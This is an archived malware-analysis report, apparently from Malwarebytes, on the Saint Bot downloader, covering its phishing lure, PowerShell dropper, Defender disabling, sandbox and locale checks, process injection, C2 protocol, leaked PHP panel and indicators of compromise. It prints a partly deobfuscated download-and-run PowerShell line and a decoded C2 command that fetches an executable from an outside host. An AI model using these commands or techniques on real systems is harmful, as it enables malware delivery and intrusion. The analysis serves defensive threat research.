{ "id": "935165f4-f8db-44b9-8553-61635957f446", "created_at": "2026-04-06T00:17:36.932821Z", "updated_at": "2026-04-10T03:37:09.04418Z", "deleted_at": null, "sha1_hash": "b331c53677c8a2fe7c9045b916221f8d2d15609f", "title": "A deep dive into Saint Bot, a new downloader", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6506729, "plain_text": "A deep dive into Saint Bot, a new downloader\r\nBy Mark Stockley\r\nPublished: 2021-04-05 · Archived: 2026-04-05 19:17:07 UTC\r\nThis post was authored by Hasherezade with contributions from Hossein Jazi and Erika Noerenberg\r\nIn late March 2021, Malwarebytes analysts discovered a phishing email with an attached zip file containing\r\nunfamiliar malware. Contained within the zip file was a PowerShell script masquerading as a link to a Bitcoin\r\nwallet. Upon analysis, the obfuscated PowerShell downloader initiated a chain of infection leading to a lesser-known malware called Saint Bot. It turned out that the same malware was also distributed in targeted campaigns\r\nagainst government institutions. For example, we found a COVID19-themed campaign targeting Georgia, where\r\nthe malicious LNK file was accompanied with a malicious document, and a decoy PDF. Both droppers lead to\r\nSaint Bot instances [1] [2].\r\nSaint Bot is a downloader that appeared quite recently, and slowly is getting momentum. It was seen dropping\r\nstealers (i.e. Taurus Stealer, or a simple AutoIt-based stealer) as well as further loaders (example). Yet its design\r\nallows to utilize it for distributing any kind of malware. Although currently it does not appear to be widespread,\r\nthere is indication that it is being actively developed. Furthermore, Saint Bot employs a wide variety of techniques\r\nwhich, although not novel, indicate some level of sophistication considering its relatively new appearance.\r\nArticle continues below this ad.\r\nIn this post, we provide a detailed deep-dive of this malware, covering in-depth analysis of the threat from\r\ndistribution through post-exploitation. In addition to behavioral analysis, we will explore other techniques\r\nemployed across the stages of infection including obfuscation and anti-analysis techniques, process injection, and\r\ncommand and control infrastructure and communication.\r\nDistribution\r\nThis analysis will be dedicated to a sample that we found distributed by a phishing e-mail. It comes with a ZIP\r\nattachment: bitcoin.zip, luring the victim with a chance of getting access to a Bitcoin wallet.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 1 of 28\n\nOnce we unzip the content, we are provided with a pair of files: one of them is a .lnk file that seemingly leads to a\r\nBitcoin Wallet. It is accompanied with a .txt file, that claims to be a password to this wallet.\r\nThe .txt file says:\r\nwallet in folder. Use Electrum to download \u0026 save it on your side https://download.electrum.org/4\r\nIf we try to preview the .lnk via various tools available on Windows, it seems to lead to\r\n“C:WindowsSystem32cmd.exe”.\r\nBut a closer look inside reveals, that in reality what it contains is a malicious PowerShell script, meant to\r\ndownload the next stage of the malware from the embedded link:\r\nhttp://68468438438[.]xyz/soft/win230321[.]exe\r\nDeobfuscated script:\r\n\u0026\u0026 C:WindowsSystem32cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; ImPoRT-modULe bIt\r\nThe next stage binary is downloaded into the %TEMP% folder, under the name WindowsUpdate.exe, and run\r\nfrom there.\r\nBehavioral analysis\r\nOnce run, the main sample drops another executable in the %TEMP% directory:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 2 of 28\n\n“C:UsersadminAppDataLocalTempInstallUtil.exe”\r\nwhich then downloads two executables named: def.exe, and putty.exe. It saves them in %TEMP% , and tries to\r\nexecute them with elevated privileges.\r\nIf run, the first sample (def.exe) deploys a batch script disabling Windows Defender. The second sample (named\r\nputty.exe) is the main malicious component.\r\nPersistence\r\nThe sample named putty.exe installs itself and creates a new directory in “AppData/Local” named\r\n“z_%USERNAME%”. It drops scripts meant to deploy its other components. The same directory also contains a\r\ncopy of NTDLL, saved under the name “wallpaper.mp4”. This copy will be used by the malicious binary instead\r\nof the legitimate one.\r\nThe main sample is copied into the Startup directory under a name impersonating one of the legitimate\r\nexecutables found in the infected system:\r\nThe scripts from the “AppData/Local/z_[user]” are used to deploy the main sample. During the first run, the\r\nexecutable injects itself into “EhStorAurhn.exe“. Below we can see the injected implant detected and dropped by\r\nHollowsHunter.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 3 of 28\n\nOnce the implant was injected, it connects to its Command-and-Control server (C2) and proceeds with its main\r\nactions. Observing the network traffic we will find the URL of the malware’s C2 queried repeatedly:\r\nhttp[:]//update-0019992[.]ru/testcp1/gate.php\r\nFollowing this URL we can see the related C2 panel, which looks typical for the Saint Bot:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 4 of 28\n\nInternals\r\nThe .NET downloader\r\nThe sample downloaded from the initial .lnk is a next stage downloader, written in .NET and obfuscated. It carries\r\nanother .NET binary in its resources, stored as a bitmap.\r\nDuring the run, it decodes the next stage, which turns out to be a .NET DLL\r\n(a98e108588e31f40cdaeab1c04d0a394eb35a2e151f95fbf8a913cba6a7faa63)\r\nThe DLL has an internal name zOAI.dll:\r\nThe loader invokes a method from the DLL:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 5 of 28\n\nThe referenced method inside the DLL:\r\nThe content of the DLL is heavily obfuscated at bytecode level, and unreadable for typical tools such as dnSpy.\r\nThe DLL is run with the help of InstallUtil.exe\r\n(e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f) – which is a standard .NET\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 6 of 28\n\nFramework Installation utility – dropped into %TEMP% folder.\r\nThe deployed .NET binary is responsible for downloading and deploying two executables: the one disabling\r\nWindows Defender, and another, which is the main payload (in a packed form).\r\nThe dropped elements\r\nTwo executables are dropped in the %TEMP% directory:\r\n79dd688046ef9f26ed0cf633cab305f18b46ce7affaa396813a9587ac2918bb0 – named def.exe\r\n2d88db4098a72cd9cb58a760e6a019f6e1587b7b03d4f074c979e776ce110403 – named putty.exe\r\nThe first one (def.exe) is just a batch script wrapped by the BatToExe tool. The script: Disable Window\r\nDefender.bat is meant to prepare the ground for the deployment of the main bot.\r\nThe other one (putty.exe) is the actual payload, packed by an underground crypter.\r\nThe unpacked payload\r\nThe final payload that is carried inside putty.exe can be dumped from the memory with the help of PE-sieve/HollowsHunter. As a result, we get the following unpacked sample:\r\na4b705baac8bb2c0d2bc111eae9735fb8586d6d1dab050f3c89fb12589470969\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 7 of 28\n\nThe compilation timestamp indicates that the payload is pretty fresh – from March of this year.\r\nObfuscation\r\nStrings\r\nLooking inside we can see that the sample is mildly obfuscated. Majority of the strings are encoded in a way\r\nreminding of a simple substitution cipher.\r\nOnly few strings are left in plaintext – including URLs to connect, but also some commands prefixed with “de”,\r\ni.e. “de:LoadMemory”, “de:regsvr32”, “de:LL”. We can also see the hardcoded panel URL: “/testcp1/gate.php”.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 8 of 28\n\nSome (but not all) of the strings can be deobfuscated with the help of the FLOSS tool. We can find out there the\r\nname and the version of this malware: “saint_v3” – which indicates the “Saint Bot version 3”.\r\nThe rest of the strings has been deobfuscated with the help of libPeConv (decoder’s source here). Full list (along\r\nwith their offsets) is available here.\r\nAPI calls\r\nAPI functions are loaded dynamically, using the names that are decoded just before use:\r\nThey can be deobfuscated with the help of various approaches, i.e. by filling their names basing on the\r\ndeobfuscated strings. They can be also traced automatically at the execution time, i.e. with the help of TinyTracer.\r\nSample result:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 9 of 28\n\nAnother, simpler (yet more invasive) way of deobfuscation is by rebuilding the Import Table within the PE to\r\ninclude the dynamically added functions. We can do it by dumping the same binary i.e. with PE-sieve, with the\r\noption of full Import Table reconstruction ( /imp 3). Yet we have to remember that this method may be less\r\naccurate in some cases: in contrast to tracing, it won’t help to deobfuscate calls that are made i.e. via registers.\r\nExecution flow\r\nThe sample has 3 alternative execution paths:\r\n1. Install itself\r\n2. Inject itself into EhStorAurhn.exe\r\n3. Communicate with the C2 and proceed with the main operations\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 10 of 28\n\nBefore it proceeds with any action, a set of environment checks is performed.\r\nDefensive checks\r\nThe sample defends itself against being executed in a controlled (or otherwise forbidden) environment by\r\nperforming a number of checks. In case any forbidden condition is detected, the sample drops and deploys del.bat\r\nscript that is supposed to delete it after the execution finish. After that the sample terminates.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 11 of 28\n\nAmong the environment checks we can find a locale check. This is very common in case the sample is intended to\r\navoid attacking certain countries.\r\nIn current case 7 locales are blacklisted:\r\n1049 – Russian\r\n1058 – Ukrainian\r\n1059 – Belarusian\r\n1067 – Armenian – Armenia\r\n1087 – Kazakh\r\n2072 – Romanian\r\n2073 – Russian – Moldova\r\nIt also queries the registry searching for keys typical for virtual environments. Queried registry key:\r\n“SYSTEMCurrentControlSetServicesdiskEnum” has its values checked against the list: QEMU, VIRTIO,\r\nVMWARE, VBOX, XEN.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 12 of 28\n\nNote that the checks are gathered all in one function, and thanks to this fact they can be easily patched out of the\r\nsample to make the analysis easier.\r\nMutex and persistence\r\nThe malware prevents itself from being deployed more than once by creating the mutex “saint_v3”.\r\nIf the mutex already exists, the program exits with an error. Otherwise it proceeds with installing its persistence. It\r\nsets a run key in “SoftwareMicrosoftWindowsCurrentVersionRun” as well as a scheduled task named\r\n“Maintenance”.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 13 of 28\n\nProcess injection\r\nThe malware injects itself into a newly created process “C:WindowsSystem32EhStorAuthn.exe”.\r\nIt writes its payload into the process using ZwWriteVirtualMemory and then executes it with the help of\r\nNtQueueApcThread and ZwAlertResumeThread. This is a variant of a well known injection involving adding a\r\nstart routine into APC Queue of the main thread. It uses low-level versions of the dedicated APIs, exported by\r\nNTDLL.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 14 of 28\n\nThe less typical twist in this technique lies in the fact that it does not use the original NTDLL, but its renamed\r\ncopy – the one that it previously dropped as wallpaper.mp4. This is one of a simple (and pretty naive) tricks that\r\naim to make detection more difficult. It bases on the assumption that monitoring tools may have installed hooks\r\ninside the original NTDLL . By using a renamed copy of this DLL, the authors tried to prevent the called APIs\r\nfrom being watched by those hooks. In this case the APIs that they tried to hide are the ones related to code\r\ninjection.\r\nCommunication with the C2\r\nThe malware comes with addresses of C2 servers hardcoded, as well as the address of the gate. The name of the\r\nbrowser agent is also hardcoded, in obfuscated form: “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/45.0.2454.101 YaBrowser/15.10.2454.3865 Safari/537.36“\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 15 of 28\n\nThe bot keeps querying the C2 and waiting for the commands. Sample beacon:\r\ntransfer=ZG5ufX1ibnhnblRUVDVNcFFDVFRUdVFDTXk+SSBbIFVGeVpmSUlReUM1RFRUVDJQVFRUT3hiVFRUS1RUVDJDY2ZEKHop\r\nWhich decodes to a list of parameters collected from the infected machine, for example:\r\ntransfer=-994429369___admin___Windows 7 Professional___IE___x32___1___Intel(R) Core(TM) i5-6400 CPU @\r\nThe content sent to/from the C2 is obfuscated by the same algorithm as the internal strings – referenced as\r\ndecode_wstring – but with a different parameter: -7 (7 for encode, -7 to decode) instead of -6. The received data is\r\nfirst being decoded, and then split by a delimiter “” into a list of commands.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 16 of 28\n\nThe list of commands processed is very small. Some of them come with a distinctive prefix “de:“.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 17 of 28\n\nSample response:\r\nXE1mInNGeUVGNXBNNWM1IlljY3M6cXFDNXBmS01tSVFjZnFaUURmbWZPZlw=\r\nAnd the same response decoded:\r\nde\"programdata\"http://name1d.site/file.exe'\r\nWhich means: download the executable from the given link, drop it in “ProgramData” directory, and execute.\r\nAs the choice of commands shows, the role of this bot is to deliver further payloads to the infected machine.\r\nThe Panel\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 18 of 28\n\nIt is always beneficial to compare what we observed by the analysis of the bot, with the server-side\r\nimplementation of the same actions. In this case it happens to be possible as we gained access to the leaked source\r\nof the panel.\r\nOverview\r\nThe panel of this bot is very small.\r\nThe main view:\r\nThe list of available bots comes with minimalist details about every victim machine, such as Username, IP, OS,\r\nArchitecture, Privileges with which the bot was deployed, Country, First and last timestamp of the communication\r\nwith the C2, and deployed Actions.\r\nTask panel allows to send commands to the bots:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 19 of 28\n\nIn this case, the list of commands is very small, as the Saint Bot serves as a downloader for other malware. The\r\navailable tasks are:\r\nDownload\u0026Execute (other payloads)\r\nUpdate (the Saint Bot)\r\nUninstall\r\nIn addition we can set several additional options to where the downloaded payload should be dropped. Three drop\r\ndirectories are supported: ProgramData, AppData, Temp:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 20 of 28\n\nThe operator can also set various filters, defining on which of the infected machines the payloads will be dropped:\r\nThe list of payloads served by the examined instance point to files uploaded at Discord:\r\nhttps[:]//cdn.discordapp[.]com/attachments/821809080812437507/822009014418276353/mixinte.exe https[\r\nThe code\r\nLike most malware panels, this one is written in PHP, with an SQL database under the hood. The module\r\nresponsible for sending the tasks to the bot is named: tasks.php. We can find the same commands we observed by\r\nanalyzing the executable’s code. Three types of tasks:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 21 of 28\n\nde – which stands for: Download\u0026Execute\r\nupdate\r\nuninstall\r\nWe can also find the available parameters, also correlating with the parameters hardcoded in the previously\r\nanalyzed executable.\r\nregsvr32 – stands for: download a DLL and run it via regsvr32\r\nll – stands for: download a DLL and run it via LoadLibrary\r\nfile – run from a dropped file\r\nmem – stands for manually load and inject into a process\r\nSome parameters are further translated, which make them a matching set with the commands that were visible in\r\nthe bot’s code:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 22 of 28\n\nSo, for the “de” option we get:\r\nde:LL\r\nde:LoadMemory\r\nde:regsvr32\r\nCompared with the commands from the previous analysis part:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 23 of 28\n\nOnce the task is created, it is added to the database, to be polled and executed further:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 24 of 28\n\nEvolution\r\nThis bot is fairly new and is evolving slowly and steadily. The earliest version found by the similar artifacts was\r\ncompiled in January (0481edd888e70087115d603ac5c18fe3e15420a28a71bc1ef753d74c27474e9a ). It came with\r\nthe same set of commands, yet slightly rewritten code.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 25 of 28\n\nIt used a mutex “saint2021_NewGeneration” suggesting that this bot went through some major changes since the\r\nbeginning of this year.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 26 of 28\n\nThe associated panel suggested that the version using this mutex was numbered as 2.0 (credits: @siri_urz)\r\nYet another downloader\r\nSaint Bot is yet another tiny downloader. We suspect it is being sold as a commodity on one of the darknet forums,\r\nand not linked with any specific actor. It is not as mature as SmokeLoader, but quite new, and currently actively\r\ndeveloped. The author seems to have some knowledge of malware design, which is visible by the wide range of\r\ntechniques used. Yet, all the deployed techniques are well-known and pretty standard, not showing much creativity\r\nso far. Will it become the next wide-spread downloader or disappear from the landscape, pushed away by some\r\nother, similar products? We have yet to see.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 27 of 28\n\nIndicators of Compromise\r\nInitial dropper (.lnk)\r\n63d7b35ca907673634ea66e73d6a38486b0b043f3d511ec2d2209597c7898ae8\r\nNext stage .NET dropper\r\nb0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274\r\n.NET downloader\r\na98e108588e31f40cdaeab1c04d0a394eb35a2e151f95fbf8a913cba6a7faa63\r\nSaint Bot (packed)\r\n2d88db4098a72cd9cb58a760e6a019f6e1587b7b03d4f074c979e776ce110403\r\nSaint Bot core\r\na4b705baac8bb2c0d2bc111eae9735fb8586d6d1dab050f3c89fb12589470969\r\nDownloader domain\r\n68468438438[.]xyz\r\nC2 servers\r\nupdate-0019992[.]ru\r\n380222001[.]xyz\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/\r\nPage 28 of 28\n\n https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/ \nOnce the task is created, it is added to the database, to be polled and executed further:\n Page 24 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/" ], "report_names": [ "a-deep-dive-into-saint-bot-downloader" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434656, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b331c53677c8a2fe7c9045b916221f8d2d15609f.pdf", "text": "https://archive.orkl.eu/b331c53677c8a2fe7c9045b916221f8d2d15609f.txt", "img": "https://archive.orkl.eu/b331c53677c8a2fe7c9045b916221f8d2d15609f.jpg" } }